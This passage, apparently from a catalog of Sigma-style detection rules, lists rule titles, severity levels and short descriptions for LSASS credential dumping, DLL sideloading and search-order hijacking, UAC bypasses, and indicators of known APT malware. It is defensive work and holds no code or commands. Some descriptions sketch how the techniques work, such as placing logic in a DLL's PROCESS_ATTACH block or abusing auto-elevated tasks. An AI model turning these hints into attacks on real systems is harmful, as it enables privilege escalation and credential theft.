  • Potential Credential Dumping Attempt Via PowerShell - Level: medium
    Description: Detects a PowerShell process requesting access to "lsass.exe", which can be indicative of potential credential dumping attempts
  • LSASS Access From Program In Potentially Suspicious Folder - Level: medium
    Description: Detects process access to LSASS memory with suspicious access flags and from a potentially suspicious folder
  • Uncommon GrantedAccess Flags On LSASS - Level: medium
    Description: Detects process access to LSASS memory with uncommon access flags 0x410 and 0x01410
attack.t1574.002 82
  • SCM DLL Sideload - Level: medium
    Description: Detects DLL sideloading of DLLs that are loaded by the SCM for some services (IKE, IKEEXT, SessionEnv) which do not exist on a typical modern system
  • Svchost DLL Search Order Hijack - Level: high
    Description: Detects DLL sideloading of DLLs that are loaded by the SCM for some services (IKE, IKEEXT, SessionEnv) which do not exist on a typical modern system, notably the IKEEXT and SessionEnv services, as they call LoadLibrary on files that do not exist within C:\Windows\System32\ by default. An attacker can place their malicious logic within the PROCESS_ATTACH block of their library and restart the aforementioned services ("svchost.exe -k netsvcs") to gain code execution on a remote machine.
  • Possible Process Hollowing Image Loading - Level: high
    Description: Detects loading of samlib.dll or WinSCard.dll from an atypical process, e.g. through process hollowing by Mimikatz
  • DNS Server Error Failed Loading the ServerLevelPluginDLL - Level: high
    Description: Detects a DNS server error in which a specified plugin DLL (in registry) could not be loaded
  • Microsoft Defender Blocked from Loading Unsigned DLL - Level: high
    Description: Detects Code Integrity (CI) engine blocking Microsoft Defender's processes (MpCmdRun and NisSrv) from loading unsigned DLLs which may be an attempt to sideload arbitrary DLL
  • Unsigned Binary Loaded From Suspicious Location - Level: high
    Description: Detects Code Integrity (CI) engine blocking processes from loading unsigned DLLs residing in suspicious locations
  • DHCP Server Error Failed Loading the CallOut DLL - Level: high
    Description: This rule detects a DHCP server error in which a specified Callout DLL (in registry) could not be loaded
  • DHCP Server Loaded the CallOut DLL - Level: high
    Description: This rule detects a DHCP server in which a specified Callout DLL (in registry) was loaded
  • Creation Of Non-Existent System DLL - Level: medium
    Description: Detects the creation of system DLLs that are usually not present on the system (or at least not in system directories). Usually this technique is used to achieve DLL hijacking.
  • DLL Search Order Hijacking Via Additional Space in Path - Level: high
    Description: Detects when an attacker creates a folder structure similar to Windows system folders (such as Windows, Program Files...) but with an additional space in order to trick the DLL load search order and perform a "DLL Search Order Hijacking" attack
  • Malicious DLL File Dropped in the Teams or OneDrive Folder - Level: high
    Description: Detects creation of a malicious DLL file in the location of the OneDrive or Teams applications. Upon execution of the Teams or OneDrive application, the dropped malicious DLL file ("iphlpapi.dll") is sideloaded
  • Potential Azure Browser SSO Abuse - Level: low
    Description: Detects abusing Azure Browser SSO by requesting OAuth 2.0 refresh tokens for an Azure-AD-authenticated Windows user (i.e. the machine is joined to Azure AD and a user logs in with their Azure AD account) wanting to perform SSO authentication in the browser. An attacker can use this to authenticate to Azure AD in a browser as that user.
  • Potential 7za.DLL Sideloading - Level: low
    Description: Detects potential DLL sideloading of "7za.dll"
  • Potential Antivirus Software DLL Sideloading - Level: medium
    Description: Detects potential DLL sideloading of DLLs that are part of antivirus software such as McAfee, Symantec, etc.
  • Potential appverifUI.DLL Sideloading - Level: high
    Description: Detects potential DLL sideloading of "appverifUI.dll"
  • Aruba Network Service Potential DLL Sideloading - Level: high
    Description: Detects potential DLL sideloading activity via the Aruba Networks Virtual Intranet Access "arubanetsvc.exe" process using DLL Search Order Hijacking
  • Potential AVKkid.DLL Sideloading - Level: medium
    Description: Detects potential DLL sideloading of "AVKkid.dll"
  • Potential CCleanerDU.DLL Sideloading - Level: medium
    Description: Detects potential DLL sideloading of "CCleanerDU.dll"
  • Potential CCleanerReactivator.DLL Sideloading - Level: medium
    Description: Detects potential DLL sideloading of "CCleanerReactivator.dll"
  • Potential Chrome Frame Helper DLL Sideloading - Level: medium
    Description: Detects potential DLL sideloading of "chrome_frame_helper.dll"
  • Potential DLL Sideloading Via ClassicExplorer32.dll - Level: medium
    Description: Detects potential DLL sideloading using ClassicExplorer32.dll from the Classic Shell software
  • Potential DLL Sideloading Via comctl32.dll - Level: high
    Description: Detects potential DLL sideloading using comctl32.dll to obtain system privileges
  • Potential DLL Sideloading Of DBGCORE.DLL - Level: medium
    Description: Detects DLL sideloading of "dbgcore.dll"
  • Potential DLL Sideloading Of DBGHELP.DLL - Level: medium
    Description: Detects potential DLL sideloading of "dbghelp.dll"
  • Potential DLL Sideloading Of DbgModel.DLL - Level: medium
    Description: Detects potential DLL sideloading of "DbgModel.dll"
  • Potential EACore.DLL Sideloading - Level: high
    Description: Detects potential DLL sideloading of "EACore.dll"
  • Potential Edputil.DLL Sideloading - Level: high
    Description: Detects potential DLL sideloading of "edputil.dll"
  • Potential System DLL Sideloading From Non System Locations - Level: high
    Description: Detects DLL sideloading of DLLs usually located in system locations (System32, SysWOW64, etc.).
  • Potential Goopdate.DLL Sideloading - Level: medium
    Description: Detects potential DLL sideloading of "goopdate.dll", a DLL used by googleupdate.exe
  • Potential DLL Sideloading Of Libcurl.DLL Via GUP.EXE - Level: medium
    Description: Detects potential DLL sideloading of "libcurl.dll" by the "gup.exe" process from an uncommon location
  • Potential Iviewers.DLL Sideloading - Level: high
    Description: Detects potential DLL sideloading of "iviewers.dll" (OLE/COM Object Interface Viewer)
  • Potential DLL Sideloading Via JsSchHlp - Level: medium
    Description: Detects potential DLL sideloading using the JUSTSYSTEMS Japanese word processor
  • Potential DLL Sideloading Of KeyScramblerIE.DLL Via KeyScrambler.EXE - Level: high
    Description: Detects potential DLL side loading of "KeyScramblerIE.dll" by "KeyScrambler.exe". Various threat actors and malware have been found side loading a masqueraded "KeyScramblerIE.dll" through "KeyScrambler.exe".
  • Potential Libvlc.DLL Sideloading - Level: medium
    Description: Detects potential DLL sideloading of "libvlc.dll", a DLL that is legitimately used by "VLC.exe"
  • Potential Mfdetours.DLL Sideloading - Level: medium
    Description: Detects potential DLL sideloading of "mfdetours.dll". While using "mftrace.exe" it can be abused to attach to an arbitrary process and force load any DLL named "mfdetours.dll" from the current directory of execution.
  • Unsigned Mfdetours.DLL Sideloading - Level: high
    Description: Detects DLL sideloading of unsigned "mfdetours.dll". Executing "mftrace.exe" can be abused to attach to an arbitrary process and force load any DLL named "mfdetours.dll" from the current directory of execution.
  • Potential DLL Sideloading Of MpSvc.DLL - Level: medium
    Description: Detects potential DLL sideloading of "MpSvc.dll".
  • Potential DLL Sideloading Of MsCorSvc.DLL - Level: medium
    Description: Detects potential DLL sideloading of "mscorsvc.dll".
  • Potential DLL Sideloading Of Non-Existent DLLs From System Folders - Level: high
    Description: Detects DLL sideloading of system DLLs that are not present on the system by default (at least not in system directories). Usually this technique is used to achieve UAC bypass or privilege escalation.
  • Microsoft Office DLL Sideload - Level: high
    Description: Detects DLL sideloading of DLLs that are part of Microsoft Office from a non-standard location
  • Potential Python DLL SideLoading - Level: medium
    Description: Detects potential DLL sideloading of Python DLL files.
  • Potential Rcdll.DLL Sideloading - Level: high
    Description: Detects potential DLL sideloading of rcdll.dll
  • Potential RjvPlatform.DLL Sideloading From Default Location - Level: medium
    Description: Detects loading of "RjvPlatform.dll" by the "SystemResetPlatform.exe" binary which can be abused as a method of DLL side loading since the "$SysReset" directory isn't created by default.
  • Potential RjvPlatform.DLL Sideloading From Non-Default Location - Level: high
    Description: Detects potential DLL sideloading of "RjvPlatform.dll" by "SystemResetPlatform.exe" located in a non-default location.
  • Potential RoboForm.DLL Sideloading - Level: medium
    Description: Detects potential DLL sideloading of "roboform.dll", a DLL used by RoboForm Password Manager
  • Potential ShellDispatch.DLL Sideloading - Level: medium
    Description: Detects potential DLL sideloading of "ShellDispatch.dll"
  • DLL Sideloading Of ShellChromeAPI.DLL - Level: high
    Description: Detects processes loading the non-existent DLL "ShellChromeAPI". One known example is the "DeviceEnroller" binary, which in combination with the "PhoneDeepLink" flag tries to load this DLL. Adversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter
  • Potential SmadHook.DLL Sideloading - Level: high
    Description: Detects potential DLL sideloading of "SmadHook.dll", a DLL used by SmadAV antivirus
  • Potential SolidPDFCreator.DLL Sideloading - Level: medium
    Description: Detects potential DLL sideloading of "SolidPDFCreator.dll"
  • Third Party Software DLL Sideloading - Level: medium
    Description: Detects DLL sideloading of DLLs that are part of third-party software (Zoom, Discord, etc.)
  • Fax Service DLL Search Order Hijack - Level: high
    Description: The Fax service attempts to load ualapi.dll, which is non-existent. An attacker can then (side)load their own malicious DLL using this service.
  • Potential Vivaldi_elf.DLL Sideloading - Level: medium
    Description: Detects potential DLL sideloading of "vivaldi_elf.dll"
  • VMGuestLib DLL Sideload - Level: medium
    Description: Detects DLL sideloading of VMGuestLib.dll by the WmiApSrv service.
  • VMMap Signed Dbghelp.DLL Potential Sideloading - Level: medium
    Description: Detects potential DLL sideloading of a signed dbghelp.dll by the Sysinternals VMMap.
  • VMMap Unsigned Dbghelp.DLL Potential Sideloading - Level: high
    Description: Detects potential DLL sideloading of an unsigned dbghelp.dll by the Sysinternals VMMap.
  • Potential DLL Sideloading Via VMware Xfer - Level: high
    Description: Detects loading of a DLL by the VMware Xfer utility from a non-default directory, which may be an attempt to sideload an arbitrary DLL
  • Potential Waveedit.DLL Sideloading - Level: high
    Description: Detects potential DLL sideloading of "waveedit.dll", which is part of the Nero WaveEditor audio editing software.
  • Potential Wazuh Security Platform DLL Sideloading - Level: medium
    Description: Detects potential DLL side loading of DLLs that are part of the Wazuh security platform
  • Potential Mpclient.DLL Sideloading - Level: high
    Description: Detects potential sideloading of "mpclient.dll" by Windows Defender processes ("MpCmdRun" and "NisSrv") from their non-default directory.
  • Potential WWlib.DLL Sideloading - Level: medium
    Description: Detects potential DLL sideloading of "wwlib.dll"
  • Unsigned Module Loaded by ClickOnce Application - Level: medium
    Description: Detects unsigned module load by ClickOnce application.
  • Suspicious Unsigned Thor Scanner Execution - Level: high
    Description: Detects loading and execution of an unsigned thor scanner binary.
  • UAC Bypass With Fake DLL - Level: high
    Description: Detects attempts to load dismcore.dll after dropping it
  • Potential DLL Sideloading Via DeviceEnroller.EXE - Level: medium
    Description: Detects the use of the PhoneDeepLink parameter to potentially sideload a DLL file that does not exist. This non-existent DLL file is named "ShellChromeAPI.dll". Adversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter
  • DLL Sideloading by VMware Xfer Utility - Level: high
    Description: Detects execution of the VMware Xfer utility (VMwareXferlogs.exe) from a non-default directory, which may be an attempt to sideload an arbitrary DLL
  • New DNS ServerLevelPluginDll Installed Via Dnscmd.EXE - Level: high
    Description: Detects the installation of a DNS plugin DLL via the ServerLevelPluginDll parameter in the registry, which can be used to execute code in the context of the DNS server (restart required)
  • Suspicious GUP Usage - Level: high
    Description: Detects execution of the Notepad++ updater in a suspicious directory, which is often used in DLL side-loading attacks
  • Potentially Suspicious Child Process of KeyScrambler.exe - Level: medium
    Description: Detects potentially suspicious child processes of KeyScrambler.exe
  • Potential Mpclient.DLL Sideloading Via Defender Binaries - Level: high
    Description: Detects potential sideloading of "mpclient.dll" by Windows Defender processes ("MpCmdRun" and "NisSrv") from their non-default directory.
  • Renamed Vmnat.exe Execution - Level: high
    Description: Detects a renamed vmnat.exe or a portable version that can be used for DLL side-loading
  • Tasks Folder Evasion - Level: high
    Description: The Tasks folders in system32 and syswow64 are globally writable paths. Adversaries can take advantage of this and load or influence any script hosts or ANY .NET application in Tasks to load and execute a custom assembly into cscript, wscript, regsvr32, mshta, eventvwr
  • Xwizard.EXE Execution From Non-Default Location - Level: high
    Description: Detects the execution of Xwizard tool from a non-default directory. When executed from a non-default directory, this utility can be abused in order to side load a custom version of "xwizards.dll".
  • DHCP Callout DLL Installation - Level: high
    Description: Detects the installation of a Callout DLL via the CalloutDlls and CalloutEnabled parameters in the registry, which can be used to execute code in the context of the DHCP server (restart required)
  • New DNS ServerLevelPluginDll Installed - Level: high
    Description: Detects the installation of a DNS plugin DLL via the ServerLevelPluginDll parameter in the registry, which can be used to execute code in the context of the DNS server (restart required)
  • Potential PlugX Activity - Level: high
    Description: Detects the execution of an executable that is typically used by PlugX for DLL side loading starting from an uncommon location
  • APT27 - Emissary Panda Activity - Level: critical
    Description: Detects the execution of DLL side-loading malware used by threat group Emissary Panda aka APT27
  • Winnti Malware HK University Campaign - Level: critical
    Description: Detects specific process characteristics of Winnti malware noticed in Dec/Jan 2020 in a campaign against Hong Kong universities
  • Winnti Pipemon Characteristics - Level: critical
    Description: Detects specific process characteristics of Winnti Pipemon malware reported by ESET
  • DLL Names Used By SVR For GraphicalProton Backdoor - Level: medium
    Description: Hunts known SVR-specific DLL names.
  • Diamond Sleet APT DLL Sideloading Indicators - Level: high
    Description: Detects DLL sideloading activity seen used by Diamond Sleet APT
  • Lazarus APT DLL Sideloading Activity - Level: high
    Description: Detects sideloading of trojanized DLLs used in Lazarus APT campaign in the case of a Spanish aerospace company
  • Potential Raspberry Robin Aclui Dll SideLoading - Level: high
    Description: Detects potential sideloading of a malicious "aclui.dll" by OleView. This behavior was observed in Raspberry Robin variants reported by Check Point Research in February 2024.
attack.t1574.001 55
Show Rules (55)
  • SCM DLL Sideload - Level: medium
    Description: Detects DLL sideloading of DLLs that are loaded by the SCM for some services (IKE, IKEEXT, SessionEnv) which do not exist on a typical modern system
  • Svchost DLL Search Order Hijack - Level: high
    Description: Detects DLL sideloading of DLLs that are loaded by the SCM for some services (IKE, IKEEXT, SessionEnv) which do not exist on a typical modern system. This concerns the IKEEXT and SessionEnv services, as they call LoadLibrary on files that do not exist within C:\Windows\System32\ by default. An attacker can place their malicious logic within the PROCESS_ATTACH block of their library and restart the aforementioned services ("svchost.exe -k netsvcs") to gain code execution on a remote machine.
  • Use Of Hidden Paths Or Files - Level: low
    Description: Detects calls to hidden files or files located in hidden directories on NIX systems.
  • Creation Of Non-Existent System DLL - Level: medium
    Description: Detects the creation of system DLLs that are usually not present on the system (or at least not in system directories). Usually this technique is used to achieve DLL hijacking.
  • HackTool - Powerup Write Hijack DLL - Level: high
    Description: The PowerUp tool's Write Hijack DLL function exploits DLL hijacking for privilege escalation. In its default mode, it builds a self-deleting .bat file which executes a malicious command. The detection rule relies on the creation of the malicious bat file (debug.bat by default).
  • Potential Initial Access via DLL Search Order Hijacking - Level: medium
    Description: Detects attempts to create a DLL file in a known desktop application dependencies folder such as Slack, Teams or OneDrive by an unusual process. This may indicate an attempt to load a malicious module via DLL search order hijacking.
  • Creation of WerFault.exe/Wer.dll in Unusual Folder - Level: medium
    Description: Detects the creation of a file named "WerFault.exe" or "wer.dll" in an uncommon folder, which could be a sign of WerFault DLL hijacking.
  • Potential 7za.DLL Sideloading - Level: low
    Description: Detects potential DLL sideloading of "7za.dll"
  • Potential Antivirus Software DLL Sideloading - Level: medium
    Description: Detects potential DLL sideloading of DLLs that are part of antivirus software such as McAfee, Symantec, etc.
  • Potential appverifUI.DLL Sideloading - Level: high
    Description: Detects potential DLL sideloading of "appverifUI.dll"
  • Aruba Network Service Potential DLL Sideloading - Level: high
    Description: Detects potential DLL sideloading activity via the Aruba Networks Virtual Intranet Access "arubanetsvc.exe" process using DLL Search Order Hijacking
  • Potential AVKkid.DLL Sideloading - Level: medium
    Description: Detects potential DLL sideloading of "AVKkid.dll"
  • Potential CCleanerDU.DLL Sideloading - Level: medium
    Description: Detects potential DLL sideloading of "CCleanerDU.dll"
  • Potential CCleanerReactivator.DLL Sideloading - Level: medium
    Description: Detects potential DLL sideloading of "CCleanerReactivator.dll"
  • Potential Chrome Frame Helper DLL Sideloading - Level: medium
    Description: Detects potential DLL sideloading of "chrome_frame_helper.dll"
  • Potential DLL Sideloading Via ClassicExplorer32.dll - Level: medium
    Description: Detects potential DLL sideloading using ClassicExplorer32.dll from the Classic Shell software
  • Potential DLL Sideloading Via comctl32.dll - Level: high
    Description: Detects potential DLL sideloading using comctl32.dll to obtain system privileges
  • Potential DLL Sideloading Of DBGCORE.DLL - Level: medium
    Description: Detects DLL sideloading of "dbgcore.dll"
  • Potential DLL Sideloading Of DBGHELP.DLL - Level: medium
    Description: Detects potential DLL sideloading of "dbghelp.dll"
  • Potential EACore.DLL Sideloading - Level: high
    Description: Detects potential DLL sideloading of "EACore.dll"
  • Potential Edputil.DLL Sideloading - Level: high
    Description: Detects potential DLL sideloading of "edputil.dll"
  • Potential System DLL Sideloading From Non System Locations - Level: high
    Description: Detects DLL sideloading of DLLs usually located in system locations (System32, SysWOW64, etc.).
  • Potential Goopdate.DLL Sideloading - Level: medium
    Description: Detects potential DLL sideloading of "goopdate.dll", a DLL used by googleupdate.exe
  • Potential DLL Sideloading Of Libcurl.DLL Via GUP.EXE - Level: medium
    Description: Detects potential DLL sideloading of "libcurl.dll" by the "gup.exe" process from an uncommon location
  • Potential Iviewers.DLL Sideloading - Level: high
    Description: Detects potential DLL sideloading of "iviewers.dll" (OLE/COM Object Interface Viewer)
  • Potential DLL Sideloading Via JsSchHlp - Level: medium
    Description: Detects potential DLL sideloading using the JUSTSYSTEMS Japanese word processor
  • Potential DLL Sideloading Of KeyScramblerIE.DLL Via KeyScrambler.EXE - Level: high
    Description: Detects potential DLL side loading of "KeyScramblerIE.dll" by "KeyScrambler.exe". Various threat actors and malware have been found side loading a masqueraded "KeyScramblerIE.dll" through "KeyScrambler.exe".
  • Potential Libvlc.DLL Sideloading - Level: medium
    Description: Detects potential DLL sideloading of "libvlc.dll", a DLL that is legitimately used by "VLC.exe"
  • Potential Mfdetours.DLL Sideloading - Level: medium
    Description: Detects potential DLL sideloading of "mfdetours.dll". While using "mftrace.exe" it can be abused to attach to an arbitrary process and force load any DLL named "mfdetours.dll" from the current directory of execution.
  • Unsigned Mfdetours.DLL Sideloading - Level: high
    Description: Detects DLL sideloading of unsigned "mfdetours.dll". Executing "mftrace.exe" can be abused to attach to an arbitrary process and force load any DLL named "mfdetours.dll" from the current directory of execution.
  • Potential DLL Sideloading Of Non-Existent DLLs From System Folders - Level: high
    Description: Detects DLL sideloading of system DLLs that are not present on the system by default (at least not in system directories). Usually this technique is used to achieve UAC bypass or privilege escalation.
  • Microsoft Office DLL Sideload - Level: high
    Description: Detects DLL sideloading of DLLs that are part of Microsoft Office from a non-standard location
  • Potential Rcdll.DLL Sideloading - Level: high
    Description: Detects potential DLL sideloading of rcdll.dll
  • Potential RjvPlatform.DLL Sideloading From Default Location - Level: medium
    Description: Detects loading of "RjvPlatform.dll" by the "SystemResetPlatform.exe" binary which can be abused as a method of DLL side loading since the "$SysReset" directory isn't created by default.
  • Potential RjvPlatform.DLL Sideloading From Non-Default Location - Level: high
    Description: Detects potential DLL sideloading of "RjvPlatform.dll" by "SystemResetPlatform.exe" located in a non-default location.
  • Potential RoboForm.DLL Sideloading - Level: medium
    Description: Detects potential DLL sideloading of "roboform.dll", a DLL used by RoboForm Password Manager
  • Potential ShellDispatch.DLL Sideloading - Level: medium
    Description: Detects potential DLL sideloading of "ShellDispatch.dll"
  • DLL Sideloading Of ShellChromeAPI.DLL - Level: high
    Description: Detects processes loading the non-existent DLL "ShellChromeAPI". One known example is the "DeviceEnroller" binary, which in combination with the "PhoneDeepLink" flag tries to load this DLL. Adversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter
  • Potential SmadHook.DLL Sideloading - Level: high
    Description: Detects potential DLL sideloading of "SmadHook.dll", a DLL used by SmadAV antivirus
  • Potential SolidPDFCreator.DLL Sideloading - Level: medium
    Description: Detects potential DLL sideloading of "SolidPDFCreator.dll"
  • Third Party Software DLL Sideloading - Level: medium
    Description: Detects DLL sideloading of DLLs that are part of third-party software (Zoom, Discord, etc.)
  • Fax Service DLL Search Order Hijack - Level: high
    Description: The Fax service attempts to load ualapi.dll, which is non-existent. An attacker can then (side)load their own malicious DLL using this service.
  • Potential Vivaldi_elf.DLL Sideloading - Level: medium
    Description: Detects potential DLL sideloading of "vivaldi_elf.dll"
  • VMGuestLib DLL Sideload - Level: medium
    Description: Detects DLL sideloading of VMGuestLib.dll by the WmiApSrv service.
  • VMMap Signed Dbghelp.DLL Potential Sideloading - Level: medium
    Description: Detects potential DLL sideloading of a signed dbghelp.dll by the Sysinternals VMMap.
  • VMMap Unsigned Dbghelp.DLL Potential Sideloading - Level: high
    Description: Detects potential DLL sideloading of an unsigned dbghelp.dll by the Sysinternals VMMap.
  • Potential Waveedit.DLL Sideloading - Level: high
    Description: Detects potential DLL sideloading of "waveedit.dll", which is part of the Nero WaveEditor audio editing software.
  • Potential Wazuh Security Platform DLL Sideloading - Level: medium
    Description: Detects potential DLL side loading of DLLs that are part of the Wazuh security platform
  • Potential WWlib.DLL Sideloading - Level: medium
    Description: Detects potential DLL sideloading of "wwlib.dll"
  • Pingback Backdoor File Indicators - Level: high
    Description: Detects the use of the Pingback backdoor, which creates an ICMP tunnel for C2, as described in the Trustwave report
  • Pingback Backdoor DLL Loading Activity - Level: high
    Description: Detects the use of the Pingback backdoor, which creates an ICMP tunnel for C2, as described in the Trustwave report
  • Pingback Backdoor Activity - Level: high
    Description: Detects the use of the Pingback backdoor, which creates an ICMP tunnel for C2, as described in the Trustwave report
  • Small Sieve Malware CommandLine Indicator - Level: high
    Description: Detects a specific command line argument being passed to a binary, as seen being used by the Small Sieve malware.
  • Lazarus APT DLL Sideloading Activity - Level: high
    Description: Detects sideloading of trojanized DLLs used in Lazarus APT campaign in the case of a Spanish aerospace company
  • Potential Raspberry Robin Aclui Dll SideLoading - Level: high
    Description: Detects potential sideloading of a malicious "aclui.dll" by OleView. This behavior was observed in Raspberry Robin variants reported by Check Point Research in February 2024.
attack.t1548.002 55
Show Rules (55)
  • UAC Bypass Using Consent and Comctl32 - File - Level: high
    Description: Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)
  • UAC Bypass Using .NET Code Profiler on MMC - Level: high
    Description: Detects the pattern of UAC Bypass using .NET Code Profiler and mmc.exe DLL hijacking (UACMe 39)
  • UAC Bypass Using IDiagnostic Profile - File - Level: high
    Description: Detects the creation of a file by "dllhost.exe" in System32 directory part of "IDiagnosticProfileUAC" UAC bypass technique
  • UAC Bypass Using IEInstal - File - Level: high
    Description: Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)
  • UAC Bypass Using MSConfig Token Modification - File - Level: high
    Description: Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)
  • UAC Bypass Using NTFS Reparse Point - File - Level: high
    Description: Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)
  • UAC Bypass Abusing Winsat Path Parsing - File - Level: high
    Description: Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)
  • UAC Bypass Using Windows Media Player - File - Level: high
    Description: Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)
  • UAC Bypass Using Iscsicpl - ImageLoad - Level: high
    Description: Detects the "iscsicpl.exe" UAC bypass technique, which leverages DLL Search Order hijacking to load a custom DLL from temp or any user-controlled location in the user's %PATH%
  • UAC Bypass With Fake DLL - Level: high
    Description: Detects attempts to load dismcore.dll after dropping it
  • HackTool - WinPwn Execution - ScriptBlock - Level: high
    Description: Detects scriptblock text keywords indicative of potential usage of the tool WinPwn, a tool for Windows and Active Directory reconnaissance and exploitation.
  • Function Call From Undocumented COM Interface EditionUpgradeManager - Level: medium
    Description: Detects function calls from the EditionUpgradeManager COM interface, an interface that is not used by standard executables.
  • UAC Bypass Using WOW64 Logger DLL Hijack - Level: high
    Description: Detects the pattern of UAC Bypass using a WoW64 logger DLL hijack (UACMe 30)
  • PowerShell Web Access Feature Enabled Via DISM - Level: high
    Description: Detects the use of DISM to enable the PowerShell Web Access feature, which could be used for remote access and potential abuse
  • Potentially Suspicious Event Viewer Child Process - Level: high
    Description: Detects uncommon or suspicious child processes of "eventvwr.exe" which might indicate a UAC bypass attempt
  • Explorer NOUACCHECK Flag - Level: high
    Description: Detects suspicious starts of explorer.exe that use the /NOUACCHECK flag, which allows all sub-processes of the newly started explorer.exe to run without any UAC checks
  • HackTool - Empire PowerShell UAC Bypass - Level: critical
    Description: Detects some Empire PowerShell UAC bypass methods
  • HackTool - UACMe Akagi Execution - Level: high
    Description: Detects the execution of UACMe, a tool used for UAC bypasses, via default PE metadata
  • HackTool - WinPwn Execution - Level: high
    Description: Detects command line keywords indicative of potential usage of the tool WinPwn, a tool for Windows and Active Directory reconnaissance and exploitation.
  • Sdclt Child Processes - Level: medium
    Description: A general detection for sdclt spawning new processes. This could be an indicator of sdclt being used for UAC bypass techniques.
  • Always Install Elevated Windows Installer - Level: medium
    Description: Detects Windows Installer service (msiexec.exe) trying to install MSI packages with SYSTEM privilege
  • Always Install Elevated MSI Spawned Cmd And Powershell - Level: medium
    Description: Detects Windows Installer service (msiexec.exe) spawning "cmd" or "powershell"
  • Bypass UAC via CMSTP - Level: high
    Description: Detects command line usage of the Microsoft Connection Manager Profile Installer (cmstp.exe) to install specially formatted local .INF files
  • UAC Bypass Using Disk Cleanup - Level: high
    Description: Detects the pattern of UAC Bypass using scheduled tasks and variable expansion of cleanmgr.exe (UACMe 34)
  • UAC Bypass Using ChangePK and SLUI - Level: high
    Description: Detects a UAC bypass that uses changepk.exe and slui.exe (UACMe 61)
  • CMSTP UAC Bypass via COM Object Access - Level: high
    Description: Detects UAC Bypass Attempt Using Microsoft Connection Manager Profile Installer Autoelevate-capable COM Objects (e.g. UACMe ID of 41, 43, 58 or 65)
  • UAC Bypass Tools Using ComputerDefaults - Level: high
    Description: Detects tools such as UACMe used to bypass UAC with computerdefaults.exe (UACMe 59)
  • UAC Bypass Using Consent and Comctl32 - Process - Level: high
    Description: Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)
  • UAC Bypass Using DismHost - Level: high
    Description: Detects the pattern of UAC Bypass using DismHost DLL hijacking (UACMe 63)
  • Bypass UAC via Fodhelper.exe - Level: high
    Description: Identifies use of Fodhelper.exe to bypass User Account Control. Adversaries use this technique to execute privileged processes.
  • UAC Bypass Using NTFS Reparse Point - Process - Level: high
    Description: Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)
  • UAC Bypass via ICMLuaUtil - Level: high
    Description: Detects the pattern of UAC Bypass using ICMLuaUtil Elevated COM interface
  • UAC Bypass Using IDiagnostic Profile - Level: high
    Description: Detects the "IDiagnosticProfileUAC" UAC bypass technique
  • UAC Bypass Using IEInstal - Process - Level: high
    Description: Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)
  • UAC Bypass Using MSConfig Token Modification - Process - Level: high
    Description: Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)
  • UAC Bypass Using PkgMgr and DISM - Level: high
    Description: Detects the pattern of UAC Bypass using pkgmgr.exe and dism.exe (UACMe 23)
  • Potential UAC Bypass Via Sdclt.EXE - Level: medium
    Description: A general detection for sdclt being spawned as an elevated process. This could be an indicator of sdclt being used for UAC bypass techniques.
  • TrustedPath UAC Bypass Pattern - Level: critical
    Description: Detects indicators of a UAC bypass method by mocking directories
  • UAC Bypass Abusing Winsat Path Parsing - Process - Level: high
    Description: Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)
  • UAC Bypass Using Windows Media Player - Process - Level: high
    Description: Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)
  • Bypass UAC via WSReset.exe - Level: high
    Description: Detects use of WSReset.exe to bypass User Account Control (UAC). Adversaries use this technique to execute privileged processes.
  • UAC Bypass WSReset - Level: high
    Description: Detects the pattern of UAC Bypass via WSReset, usable with the default sysmon-config
  • UAC Bypass Via Wsreset - Level: high
    Description: Unfixed method for UAC bypass from Windows 10. WSReset.exe is a file associated with the Windows Store. It will run a binary file contained in a low-privilege registry key.
  • Shell Open Registry Keys Manipulation - Level: high
    Description: Detects the shell open key manipulation (exefile and ms-settings) used for persistence and the pattern of UAC Bypass using fodhelper.exe, computerdefaults.exe, slui.exe via registry keys (e.g. UACMe 33 or 62)
  • Bypass UAC Using DelegateExecute - Level: high
    Description: Detects bypassing of User Account Control using a fileless method
  • Bypass UAC Using SilentCleanup Task - Level: high
    Description: Detects the setting of the environment variable "windir" to a non-default value. Attackers often abuse this variable in order to trigger a UAC bypass via the "SilentCleanup" task. The SilentCleanup task located in %windir%\system32\cleanmgr.exe is an auto-elevated task that can be abused to elevate any file with administrator privileges without prompting UAC.
  • UAC Bypass via Event Viewer - Level: high
    Description: Detects UAC bypass method using Windows event viewer
  • UAC Bypass via Sdclt - Level: high
    Description: Detects the pattern of UAC Bypass using registry key manipulation of sdclt.exe (e.g. UACMe 53)
  • UAC Bypass Abusing Winsat Path Parsing - Registry - Level: high
    Description: Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)
  • UAC Bypass Using Windows Media Player - Registry - Level: high
    Description: Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)
  • UAC Disabled - Level: medium
    Description: Detects when an attacker tries to disable User Account Control (UAC) by setting the registry value "EnableLUA" to 0.
  • UAC Notification Disabled - Level: medium
    Description: Detects when an attacker tries to disable User Account Control (UAC) notification by tampering with the "UACDisableNotify" value. UAC is a critical security feature in Windows that prevents unauthorized changes to the operating system. It prompts the user for permission or an administrator password before allowing actions that could affect the system's operation or change settings that affect other users. When "UACDisableNotify" is set to 1, UAC prompts are suppressed.
  • UAC Secure Desktop Prompt Disabled - Level: medium
